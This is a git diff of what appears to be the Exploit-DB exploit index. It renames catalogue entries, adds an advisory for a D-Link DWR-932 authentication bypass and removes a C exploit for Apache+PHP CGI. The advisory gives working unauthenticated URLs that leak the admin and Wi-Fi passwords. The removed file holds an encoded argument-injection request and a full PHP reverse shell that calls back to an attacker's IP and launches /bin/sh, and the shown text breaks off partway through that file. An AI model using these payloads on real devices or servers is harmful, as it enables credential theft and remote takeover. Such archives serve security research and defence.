 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x xploitation Via LPD Vulnerability",2001-06-23,zen-parse,linux,remote,0
-21038,platforms/php/webapps/21038.txt,"PHP Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty",2001-07-27,dinopio,php,webapps,0
+21038,platforms/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty",2001-07-27,dinopio,php,webapps,0
 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 Hex Encoded URL Directory Traversal Vulnerability",2001-07-26,THRAN,windows,remote,0
 21040,platforms/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service Vulnerability",2001-07-30,"Paul Starzetz",windows,dos,0
 21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 Possible Buffer Overflow Vulnerability",2001-07-29,Coolest,multiple,dos,0
@ -18628,7 +18628,7 @@ id,file,description,date,author,platform,type,port
 21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6_Mozilla 0.8/0.9.x_Opera 5/6 JavaScript Interpreter Denial of Service Vulnerability",2002-03-19,"Patrik Birgersson",windows,dos,0
 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x Move_Uploaded_File Open_Basedir Circumvention Vulnerability",2002-03-17,Tozz,php,local,0
 21348,platforms/linux/local/21348.txt,"Webmin 0.x - Script Code Input Validation Vulnerability",2002-03-20,prophecy,linux,local,0
-21349,platforms/php/webapps/21349.txt,"PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability",2002-03-21,godminus,php,webapps,0
+21349,platforms/php/webapps/21349.txt,"PHP-Nuke 5.x - Error Message Web Root Disclosure Vulnerability",2002-03-21,godminus,php,webapps,0
 21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability",2002-03-21,SPAX,windows,remote,0
 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 Weak Password Encryption Vulnerability",2002-03-22,c3rb3r,windows,local,0
 21352,platforms/cgi/webapps/21352.txt,"DCShop Beta 1.0 Form Manipulation Vulnerability",2002-03-25,"pokleyzz sakamaniaka",cgi,webapps,0
@ -20517,7 +20517,7 @@ id,file,description,date,author,platform,type,port
 23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0
 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0
 23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0
-23289,platforms/php/webapps/23289.txt,"PHP Nuke 8.2.4 - CSRF Vulnerability",2012-12-11,sajith,php,webapps,0
+23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - CSRF Vulnerability",2012-12-11,sajith,php,webapps,0
 23290,platforms/windows/remote/23290.rb,"HP Data Protector DtbClsLogin Buffer Overflow",2012-12-11,metasploit,windows,remote,0
 23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability",2003-10-30,ProXy,php,webapps,0
 23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 IFRAME Zone Restriction Bypass Vulnerability",2003-10-24,Mindwarper,multiple,remote,0
@ -21825,7 +21825,7 @@ id,file,description,date,author,platform,type,port
 24662,platforms/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x news.php cid Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0
 24663,platforms/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x contents.php cid Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0
 24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0
-24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x Calendar.PHP HTTP Response Splitting Vulnerability",2004-10-06,"Alexander Antipov",php,webapps,0
+24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - Calendar.PHP HTTP Response Splitting Vulnerability",2004-10-06,"Alexander Antipov",php,webapps,0
 24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability",2004-10-06,anonymous,asp,webapps,0
 24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - Wp-login.PHP HTTP Response Splitting Vulnerability",2004-10-07,"Chaotic Evil",php,webapps,0
 24668,platforms/multiple/dos/24668.txt,"Jera Technology Flash Messaging Server 5.2 - Remote Denial of Service Vulnerability",2004-10-07,"Luigi Auriemma",multiple,dos,0
@ -22781,7 +22781,7 @@ id,file,description,date,author,platform,type,port
 25632,platforms/cgi/webapps/25632.txt,"Easy Message Board Directory Traversal Vulnerability",2005-05-09,"SoulBlack Group",cgi,webapps,0
 25633,platforms/windows/dos/25633.txt,"AOL Instant Messenger 4.x/5.x Smiley Icon Location Remote Denial of Service Vulnerability",2005-05-09,fjlj@wvi.com,windows,dos,0
 25634,platforms/cgi/webapps/25634.txt,"Easy Message Board Remote Command Execution Vulnerability",2005-05-09,"SoulBlack Group",cgi,webapps,0
-25635,platforms/php/webapps/25635.txt,"PHP Nuke 0-7 Double Hex Encoded Input Validation Vulnerability",2005-05-09,fistfuxxer@gmx.de,php,webapps,0
+25635,platforms/php/webapps/25635.txt,"PHP-Nuke 0-7 - Double Hex Encoded Input Validation Vulnerability",2005-05-09,fistfuxxer@gmx.de,php,webapps,0
 25636,platforms/windows/local/25636.txt,"Positive Software H-Sphere Winbox 2.4 Sensitive Logfile Content Disclosure Vulnerability",2005-05-09,"Morning Wood",windows,local,0
 25637,platforms/php/webapps/25637.txt,"CodeThatShoppingCart 1.3.1 catalog.php id Parameter XSS",2005-05-09,Lostmon,php,webapps,0
 25638,platforms/php/webapps/25638.txt,"CodeThatShoppingCart 1.3.1 catalog.php id Parameter SQL Injection",2005-05-09,Lostmon,php,webapps,0
@ -24619,7 +24619,7 @@ id,file,description,date,author,platform,type,port
 27505,platforms/php/webapps/27505.txt,"Connect Daily 3.2.8/3.2.9 ViewCal.html item_type_id Parameter XSS",2006-03-28,r0t,php,webapps,0
 27506,platforms/php/webapps/27506.txt,"Connect Daily 3.2.8/3.2.9 ViewWeek.html week Parameter XSS",2006-03-28,r0t,php,webapps,0
 27507,platforms/php/webapps/27507.txt,"AL-Caricatier 2.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,Linux_Drox,php,webapps,0
-27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x Html_Entity_Decode() Information Disclosure Vulnerability",2006-03-29,Samuel,php,remote,0
+27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure Vulnerability",2006-03-29,Samuel,php,remote,0
 27509,platforms/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk Index.PHP SQL Injection Vulnerability",2006-03-28,Preddy,php,webapps,0
 27510,platforms/php/webapps/27510.txt,"PhxContacts 0.93 carnet.php Multiple Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0
 27511,platforms/php/webapps/27511.txt,"PhxContacts 0.93 contact_view.php id_contact Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0
@ -25468,7 +25468,7 @@ id,file,description,date,author,platform,type,port
 28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 MosConfig_absolute_path Multiple Remote File Include Vulnerabilities",2006-08-18,Crackers_Child,php,webapps,0
 28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Local Privilege Escalation Vulnerability",2006-08-18,Netragard,linux,local,0
 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 Icon_Topic SQL Injection Vulnerability",2006-08-19,"Chris Boulton",php,webapps,0
-28407,platforms/php/remote/28407.rb,"Western Digital Arkeia Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
+28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
 28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution",2013-09-20,xistence,php,remote,0
 28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 (index.php onlyforuser param) - SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0
 28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Include Vulnerability",2006-08-21,O.U.T.L.A.W,php,webapps,0
@ -26305,7 +26305,7 @@ id,file,description,date,author,platform,type,port
 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing Vulnerability",2006-12-15,"Matousec Transparent security",windows,dos,0
 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0
 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.PHP Local File Include Vulnerability",2006-12-16,Kacper,php,webapps,0
-29290,platforms/linux/remote/29290.c,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,linux,remote,80
+29290,platforms/php/remote/29290.c,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80
 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection Vulnerability",2006-12-16,ShaFuck31,asp,webapps,0
 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection Vulnerability",2006-12-18,IMHOT3B,php,webapps,0
 29295,platforms/windows/dos/29295.html,"Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service Vulnerability",2006-12-18,shinnai,windows,dos,0
@ -26329,7 +26329,7 @@ id,file,description,date,author,platform,type,port
 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0
 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0
 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0
-29316,platforms/php/remote/29316.py,"Apache + PHP 5.x (< 5.3.12 / < 5.4.2) - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0
+29316,platforms/php/remote/29316.py,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0
 29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0
@ -27124,7 +27124,7 @@ id,file,description,date,author,platform,type,port
 30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 Parser_Path Remote File Include Vulnerability",2007-05-22,the_Edit0r,php,webapps,0
 30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0
 30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 ShowOwn.PHP Cross-Site Scripting Vulnerability",2007-05-22,CorryL,php,webapps,0
-30074,platforms/linux/remote/30074.txt,"PHP PEAR <= 1.5.3 INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability",2007-05-07,"Gregory Beaver",linux,remote,0
+30074,platforms/linux/remote/30074.txt,"PHP PEAR <= 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability",2007-05-07,"Gregory Beaver",linux,remote,0
 30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 SQLEDIT.PHP Cross-Site Scripting Vulnerability",2007-05-23,"Michal Majchrowicz",php,webapps,0
 30076,platforms/php/webapps/30076.txt,"WYYS 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-05-23,vagrant,php,webapps,0
 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting Vulnerability",2007-05-23,"Marc Ruef",asp,webapps,0
@ -31340,7 +31340,7 @@ id,file,description,date,author,platform,type,port
 34774,platforms/php/webapps/34774.txt,"Hotscripts Type PHP Clone Script feedback.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
 34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script index.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
 34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
-34777,platforms/cgi/remote/34777.rb,"GNU bash Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote,0
+34777,platforms/cgi/remote/34777.rb,"GNU Bash - Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote,0
 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80
 34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll 'demo_page.php' Cross-Site Scripting Vulnerability",2009-07-16,Moudi,php,webapps,0
@ -31443,7 +31443,7 @@ id,file,description,date,author,platform,type,port
 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting Vulnerability",2010-10-21,"Antu Sanadi",php,webapps,0
 34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
-34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE (Metasploit) Shellshock Exploit",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
+34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
 34896,platforms/linux/remote/34896.py,"Postfix SMTP - Shellshock Exploit",2014-10-06,"Phil Blank",linux,remote,0
 34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
@ -33790,7 +33790,7 @@ id,file,description,date,author,platform,type,port
 37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
 37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
 37427,platforms/linux/shellcode/37427.txt,"encoded 64 bit execve shellcode",2015-06-29,"Bill Borskey",linux,shellcode,0
-37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit Module)",2015-06-29,"Ben Lincoln",cgi,remote,0
+37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",cgi,remote,0
 37430,platforms/php/webapps/37430.txt,"CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0
 37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin 'uploadify.php' Arbitrary File Upload Vulnerability",2012-06-19,"Sammy FORGIT",php,webapps,0
 37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure Vulnerability",2012-06-19,"Sammy FORGIT",php,webapps,0
@ -35806,3 +35806,17 @@ id,file,description,date,author,platform,type,port
 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
 39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
 39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
 39574,platforms/windows/local/39574.cs,"Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
 39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
 39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
 39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
 39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0
 39580,platforms/php/webapps/39580.txt,"Disc ORGanizer - DORG - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80
 39581,platforms/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80
 39582,platforms/php/webapps/39582.txt,"Xoops 2.5.7.2 - Arbitrary User Deletions CSRF",2016-03-21,hyp3rlinx,php,webapps,80
 39583,platforms/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,php,webapps,80
 39584,platforms/php/webapps/39584.txt,"WordPress Image Export Plugin 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,php,webapps,80
 39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share SEH Overflow RCE Exploit",2016-03-21,"Paul Purcell",windows,remote,80
 39586,platforms/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - CSRF Vulnerabilities",2016-03-21,"High-Tech Bridge SA",php,webapps,80
 39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - CSRF Vulnerability",2016-03-21,"High-Tech Bridge SA",php,webapps,80
 39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple XSS Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80
--- a/platforms/hardware/webapps/39581.txt
+++ b/platforms/hardware/webapps/39581.txt
@ -0,0 +1,36 @@
 D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure
 Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
 Product: D-Link DWR-932 
 Tested Version: Firmware V4.00(EU)b03
 Vendor: D-Link http://www.dlink.com/
 Product URL: http://www.dlink.com/uk/en/home-solutions/work/personal-hotspots/dwr-932-4g-lte-mobile-wi-fi-hotspot-150-mbps
 Date: 20 Mar 2016
 About Product: 
 ---------------
 The DWR-932 4G LTE Mobile Wi-Fi Hotspot 150 Mbps is a 4G/LTE Cat4 high speed broadband Wi-Fi mobile hotspot. The DWR-932 uses a 4G Internet connection to give you a simple and fast Wi-Fi network anywhere you need.
 Vulnerability Details:
 ----------------------
 The Cgi Script "/cgi-bin/dget.cgi" handles most of user side and server side requests, but there is no observation on requests recieved from unauthorized users.
 so the attacker will be able to view Adminitrative or Wifi Password in clear text by visiting below URLs.
 View Admin Username and Password:
 http://192.168.0.1/cgi-bin/dget.cgi?cmd=DEVICE_web_usrname,DEVICE_web_passwd,DEVICE_login_timeout&_=1458459188807
 Output:
 { "DEVICE_web_usrname": "MyUsErNaMe", "DEVICE_web_passwd": "MyPaSsWoRd", "DEVICE_login_timeout": "600" }
 View Wifi Password:
 http://192.168.0.1/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703
 Output:
 { "wifi_AP1_ssid": "dlink-DWR-932", "wifi_AP1_hidden": "0", "wifi_AP1_passphrase": "MyPaSsPhRaSe", "wifi_AP1_passphrase_wep": "", "wifi_AP1_security_mode": "3208,8", "wifi_AP1_enable": "1", "get_mac_filter_list": "", "get_mac_filter_switch": "0", "get_client_list": "9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0", "get_mac_address": "c4:00:f5:00:ec:40", "get_wps_dev_pin": "", "get_wps_mode": "0", "get_wps_enable": "0", "get_wps_current_time": "" }
 Export All Configurations:
 http://192.168.0.1/cgi-bin/export_cfg.cgi
 #EOF
--- a/platforms/linux/remote/29290.c
+++ b/platforms/linux/remote/29290.c
@ -1,457 +0,0 @@
 /* Apache Magica by Kingcope */
 /* gcc apache-magika.c -o apache-magika -lssl */
 /* This is a code execution bug in the combination of Apache and PHP.
 On Debian and Ubuntu the vulnerability is present in the default install
 of the php5-cgi package. When the php5-cgi package is installed on Debian and
 Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
 /cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
 the binary because this binary has a security check enabled when installed with
 Apache http server and this security check is circumvented by the exploit.
 When accessing the php-cgi binary the security check will block the request and
 will not execute the binary.
 In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
 check is done when the php.ini configuration setting cgi.force_redirect is set
 and the php.ini configuration setting cgi.redirect_status_env is set to no.
 This makes it possible to execute the binary bypassing the Security check by
 setting these two php.ini settings.
 Prior to this code for the Security check getopt is called and it is possible
 to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
 -d switch. If both values are set to zero and the request is sent to the server
 php-cgi gets fully executed and we can use the payload in the POST data field
 to execute arbitrary php and therefore we can execute programs on the system.
 apache-magika.c is an exploit that does exactly the prior described. It does
 support SSL.
 /* Affected and tested versions
 PHP 5.3.10
 PHP 5.3.8-1
 PHP 5.3.6-13
 PHP 5.3.3
 PHP 5.2.17
 PHP 5.2.11
 PHP 5.2.6-3
 PHP 5.2.6+lenny16 with Suhosin-Patch
 Affected versions
 PHP prior to 5.3.12
 PHP prior to 5.4.2
 Unaffected versions
 PHP 4 - getopt parser unexploitable
 PHP 5.3.12 and up
 PHP 5.4.2 and up
 Unaffected versions are patched by CVE-2012-1823.
 */
 /*    .
     /'\rrq rk
 .  // \\  .
 .x.//fco\\-|-
 '//cmtco\\zt
 //6meqrg.\\tq
 //_________\\'
 EJPGQO
 apache-magica.c by Kingcope
 */
 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <getopt.h>
 #include <sys/types.h>
 #include <stddef.h>
 #include <openssl/rand.h>
 #include <openssl/ssl.h>
 #include <openssl/err.h>
 #include <netdb.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 typedef struct {
 	int sockfd;
 	SSL *handle;
 	SSL_CTX *ctx;
 } connection;
 void usage(char *argv[])
 {
  printf("usage: %s <--target target> <--port port> <--protocol http|https> " \
  "<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\n",
   argv[0]);
  exit(1);
 }
 char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
 "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
 "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
 "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
 "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
 "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
 "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
 "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \
 "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \
 "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \
 "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \
 "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \
 "Host: %s\r\n" \
 "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \
 "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \
 "Content-Type: application/x-www-form-urlencoded\r\n" \
 "Content-Length: %d\r\n" \
 "Connection: close\r\n\r\n%s";
 char phpstr[] = "<?php\n" \
 "set_time_limit(0);\n" \
 "$ip = '%s';\n" \
 "$port = %d;\n" \
 "$chunk_size = 1400;\n" \
 "$write_a = null;\n" \
 "$error_a = null;\n" \
 "$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\n" \
 "$daemon = 0;\n" \
 "$debug = 0;\n" \
 "if (function_exists('pcntl_fork')) {\n" \
 "	$pid = pcntl_fork();	\n" \
 "	if ($pid == -1) {\n" \
 "		printit(\"ERROR: Can't fork\");\n" \
 "		exit(1);\n" \
 "	}\n" \
 "	if ($pid) {\n" \
 "		exit(0);\n" \
 "	}\n" \
 "	if (posix_setsid() == -1) {\n" \
 "		printit(\"Error: Can't setsid()\");\n" \
 "		exit(1);\n" \
 "	}\n" \
 "	$daemon = 1;\n" \
 "} else {\n" \
 "	printit(\"WARNING: Failed to daemonise.\");\n" \
 "}\n" \
 "chdir(\"/\");\n" \
 "umask(0);\n" \
 "$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n" \
 "if (!$sock) {\n" \
 "	printit(\"$errstr ($errno)\");\n" \
 "	exit(1);\n" \
 "}\n" \
 "$descriptorspec = array(\n" \
 "   0 => array(\"pipe\", \"r\"),\n" \
 "   1 => array(\"pipe\", \"w\"),\n" \
 "   2 => array(\"pipe\", \"w\")\n" \
 ");\n" \
 "$process = proc_open($shell, $descriptorspec, $pipes);\n" \
 "if (!is_resource($process)) {\n" \
 "	printit(\"ERROR: Can't spawn shell\");\n" \
 "	exit(1);\n" \
 "}\n" \
 "stream_set_blocking($pipes[0], 0);\n" \
 "stream_set_blocking($pipes[1], 0);\n" \
 "stream_set_blocking($pipes[2], 0);\n" \
 "stream_set_blocking($sock, 0);\n" \
 "while (1) {\n" \
 "	if (feof($sock)) {\n" \
 "		printit(\"ERROR: Shell connection terminated\");\n" \
 "		break;\n" \
 "	}\n" \
 "	if (feof($pipes[1])) {\n" \
 "		printit(\"ERROR: Shell process terminated\");\n" \
 "		break;\n" \
 "	}\n" \
 "	$read_a = array($sock, $pipes[1], $pipes[2]);\n" \
 "	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n" \
 "	if (in_array($sock, $read_a)) {\n" \
 "		if ($debug) printit(\"SOCK READ\");\n" \
 "		$input = fread($sock, $chunk_size);\n" \
 "		if ($debug) printit(\"SOCK: $input\");\n" \
 "		fwrite($pipes[0], $input);\n" \
 "	}\n" \
 "	if (in_array($pipes[1], $read_a)) {\n" \
 "		if ($debug) printit(\"STDOUT READ\");\n" \
 "		$input = fread($pipes[1], $chunk_size);\n" \
 "		if ($debug) printit(\"STDOUT: $input\");\n" \
 "		fwrite($sock, $input);\n" \
 "	}\n" \
 "	if (in_array($pipes[2], $read_a)) {\n" \
 "		if ($debug) printit(\"STDERR READ\");\n" \
 "		$input = fread($pipes[2], $chunk_size);\n" \
 "		if ($debug) printit(\"STDERR: $input\");\n" \
 "		fwrite($sock, $input);\n" \
 "	}\n" \
 "}\n" \
 "\n" \
 "fclose($sock);\n" \
 "fclose($pipes[0]);\n" \
 "fclose($pipes[1]);\n" \
 "fclose($pipes[2]);\n" \
 "proc_close($process);\n" \
 "function printit ($string) {\n" \
 "	if (!$daemon) {\n" \
 "		print \"$string\n\";\n" \
 "	}\n" \
 "}\n" \
 "exit(1);\n" \
 "?>";
 struct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)
 {
 struct hostent *he;
 struct sockaddr_in server, *servercopy;
 if ((he=gethostbyname(hostname)) == NULL) {
  printf("Hostname cannot be resolved\n");
  exit(255);
 }
